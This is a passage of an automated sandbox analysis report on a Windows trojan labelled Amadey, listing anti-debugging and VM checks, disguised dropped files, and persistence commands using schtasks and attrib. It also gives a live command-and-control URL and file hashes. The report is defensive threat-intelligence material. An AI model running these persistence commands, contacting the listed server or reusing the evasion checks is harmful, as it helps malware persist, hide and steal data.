Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35502
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35393
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35252
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35142
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 34978
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 34487
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 34362
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 34237
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 34111
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33986
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33862
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33736
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33611
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33486
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33361
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33236
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 33111
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32987
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32861
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32736
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32612
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32486
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 32346
Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: DQmU06kq9I.exe, 00000000.00000003.2732563595.00000000086D2000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4551880694.00000000086D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2_m,
Source: DQmU06kq9I.exe, 00000009.00000002.4553100366.000000000916B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-[vk
Source: DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: DQmU06kq9I.exe, 00000000.00000002.4541180333.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000008.00000002.4541522203.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\DQmU06kq9I.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process information queried: ProcessInformation

                    Anti Debugging

Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\DQmU06kq9I.exe File opened: NTICE
Source: C:\Users\user\Desktop\DQmU06kq9I.exe File opened: SICE
Source: C:\Users\user\Desktop\DQmU06kq9I.exe File opened: SIWVID
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "DQmU06kq9I"
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe"
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe"
Source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000002.4541299248.00000000006ED000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Program Manager
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 5440, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 2000, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 2680, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 5440, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 2000, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: DQmU06kq9I.exe PID: 2680, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 841 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 22 Command and Scripting Interpreter | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 2 Registry Run Keys / Startup Folder | 371 Virtualization/Sandbox Evasion | Security Account Manager | 371 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 324 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
[Behavior graph (image not reproduced): Behavior Graph ID: 1576609, Sample: DQmU06kq9I.exe, Start date: 17/12/2024, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| DQmU06kq9I.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| DQmU06kq9I.exe | 35% | Virustotal | | Browse |
| DQmU06kq9I.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\OneDrive\msbuild.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\mozilla maintenance service.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\jdownloader.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\msecache.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\google.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\windows mail.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\common files.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\java.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\windows defender.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\microsoft.net.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\microsoft.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\reference assemblies.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\microsoft office.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\internet explorer.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\autoit3.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\OneDrive\autoit3.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\common files.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\google.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\internet explorer.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\java.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\jdownloader.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\microsoft office.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\microsoft.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\microsoft.net.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\mozilla maintenance service.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\msbuild.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\msecache.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\reference assemblies.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows defender.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows mail.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows media player.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows multimedia platform.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows nt.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows photo viewer.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows portable devices.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windows sidebar.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
| C:\Users\user\OneDrive\windowspowershell.exe | 61% | ReversingLabs | Win32.Trojan.Amadey | |
                    No Antivirus matches
                    No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://185.208.159.109/panel/page.php | 0% | Avira URL Cloud | safe | |
| http://185.208.159.109/panel/page.phpP | 0% | Avira URL Cloud | safe | |
| http://185.208.159.109/panel/page.php9 | 0% | Avira URL Cloud | safe | |
| http://185.208.159.109 | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://185.208.159.109/panel/page.php | true | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://185.208.159.109/panel/page.phpP | DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://185.208.159.109/panel/page.php9 | DQmU06kq9I.exe, 00000009.00000002.4542857867.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000003.3530428715.00000000010F7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000521C000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://185.208.159.109 | DQmU06kq9I.exe, 00000000.00000002.4547997981.0000000005280000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.000000000526E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000000.00000002.4547997981.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.000000000507E000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005037000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.00000000050B0000.00000004.00000800.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4548078774.0000000005026000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
185.208.159.109 | unknown | Switzerland | 34888 | SIMPLECARRER2IT | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1576609
                        Start date and time:2024-12-17 10:18:18 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:45
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Sample name:DQmU06kq9I.exe
                        renamed because original name is a hash value
                        Original Sample Name:d37dab4c59e707f632bb0b91eaa87ff9.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.mine.winEXE@53/47@0/1
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                        • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, crl3.digicert.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target DQmU06kq9I.exe, PID 2000 because it is empty
                        • Execution Graph export aborted for target DQmU06kq9I.exe, PID 2680 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
04:19:10 | API Interceptor | 7273251x Sleep call for process: DQmU06kq9I.exe modified
10:20:07 | Task Scheduler | Run new task: DQmU06kq9I path: C:\Users\user\Desktop\DQmU06kq9I.exe
10:20:11 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.208.159.109 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 185.208.159.109/panel/page.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fp2e7a.wpc.phicdn.net | 3fX4NR35LH.exe | malicious | Cryptbot | 192.229.221.95
fp2e7a.wpc.phicdn.net | a8o2z9Awf6.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | BKT2HSG6sZ.exe | malicious | RedLine | 192.229.221.95
fp2e7a.wpc.phicdn.net | PO#11111002222.vbs | malicious | FormBook | 192.229.221.95
fp2e7a.wpc.phicdn.net | Instruction_695-18112-002_Rev.PDF.lnk.d.lnk | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | Client-built.exe | malicious | Quasar | 192.229.221.95
fp2e7a.wpc.phicdn.net | nj.exe | malicious | Quasar | 192.229.221.95
fp2e7a.wpc.phicdn.net | gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT | 192.229.221.95
fp2e7a.wpc.phicdn.net | wayneenterprisesbatcave-6.0.1901-windows-installer.msi | malicious | ScreenConnect Tool | 192.229.221.95
fp2e7a.wpc.phicdn.net | 09-FD-94.03.60.175.07.xlsx.exe | malicious | GuLoader | 192.229.221.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SIMPLECARRER2IT | file.exe | malicious | LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig | 185.208.159.109
SIMPLECARRER2IT | file.exe | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | 185.196.8.237
SIMPLECARRER2IT | file.exe | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | Ziraat Bankasi Swift Mesaji.dqy.dll | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | file.exe | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | file.exe | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | lLNOwu1HG4.js | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | file.exe | malicious | PureLog Stealer, XWorm | 185.196.8.239
SIMPLECARRER2IT | stail.exe | malicious | Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | getlab.exe | malicious | Socks5Systemz | 185.208.158.202
                        No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\OneDrive\common files.exe | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig
C:\Users\user\OneDrive\common files.exe | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig
C:\Users\user\OneDrive\common files.exe | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig
C:\Users\user\OneDrive\common files.exe | file.exe | malicious | LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig
C:\Users\user\OneDrive\autoit3.exe | file.exe | malicious | LummaC, Amadey, Credential Flusher, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                        Category:dropped
                                        Size (bytes):489
                                        Entropy (8bit):4.1890631882140195
                                        Encrypted:false
                                        SSDEEP:12:8mcM1qzYNbRuVC/p4+TG7jEjA2dNIRcqqTGIFi:8mlTnuk4+y7UA2DIR2yB
                                        MD5:A9F0FC9E0646B0C627AECFF550F859DE
                                        SHA1:6D53BAC72201CA4161E8A4E5AE87F50C5A12349E
                                        SHA-256:120130EFFFB439A0E9F1BAC3C333565DCB06927E53658D30A7D4003E7EAC0670
                                        SHA-512:277ED187D5232C983D14E6EE3EB5C3A3942D2A25772956E0A690500EEC7F91965B66733C249E6DDF9F3F16ACABBC1E388EC8967EF3F496A16104E95AB51F9FC1
                                        Malicious:false
                                        Preview:L..................F.............................................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O.........m.....V.dP....j.2......YdJ .DQMU06~1.EXE..N......DW.r.YdJ..........................-j..D.Q.m.U.0.6.k.q.9.I...e.x.e.......U...............-.......T...........*.a/.....C:\Users\user\Desktop\DQmU06kq9I.exe..+.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.Q.m.U.0.6.k.q.9.I...e.x.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.....
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1763328
                                        Entropy (8bit):7.9328592774034865
                                        Encrypted:false
                                        SSDEEP:49152:z/CDAVERG4Wk9R/dA0AwqSoym/VkICGdt:7859Rdy8oVmm
                                        MD5:D37DAB4C59E707F632BB0B91EAA87FF9
                                        SHA1:0E153DEBCF54805A0543646620511B57865D6FC9
                                        SHA-256:375A067BE10250DC045EA14025444AD7EC0662CF189ABBBD393E6F7FFE85B35D
                                        SHA-512:0AE81ABBE56F0A20C8066C52672D969C962A20B19C7E7165B12C7B16A4F0681C4F96CE2CEDDE50ADE5975CED262D581FC99D0947C188CEC847C8A82EB85BC0AE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 61%
                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}^g..............0...............E.. ........@.. ........................E...........`.................................U...i................................................................................................................... . ..... ...T... ..............@....rsrc................t..............@....idata . ..........................@... . *.. ......................@...fsrfimey.@...@+..<..................@...mhpawist. ....E.....................@....taggant.@....E.."..................@...........................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\DQmU06kq9I.exe
